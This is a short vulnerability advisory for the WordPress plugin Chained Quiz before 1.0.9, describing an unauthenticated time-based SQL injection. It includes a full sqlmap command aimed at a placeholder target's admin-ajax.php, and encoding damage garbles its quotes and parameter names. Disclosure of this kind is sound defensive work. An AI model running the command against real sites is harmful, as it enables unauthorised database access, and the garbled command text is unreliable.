WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the βanswerβ and βanswersβ parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL-Injection. The issue lies on the β$answerβ backend variable. Privileges required: None
The following exploit will cause the SQL query to execute and sleep for 10 seconds: Using SQLMAP: sqlmap -u βhttp://target/wp-admin/admin-ajax.phpβ --data=βanswer=1*&question;_id=1&quiz;_id=1&post;_id=5&question;_type=radio&points;=0&action;=chainedquiz_ajax&chainedquiz;_action=answer&total;_questions=1β --dbms=MySQL --technique T
CPE | Name | Operator | Version |
---|---|---|---|
chained-quiz | lt | 1.0.9 |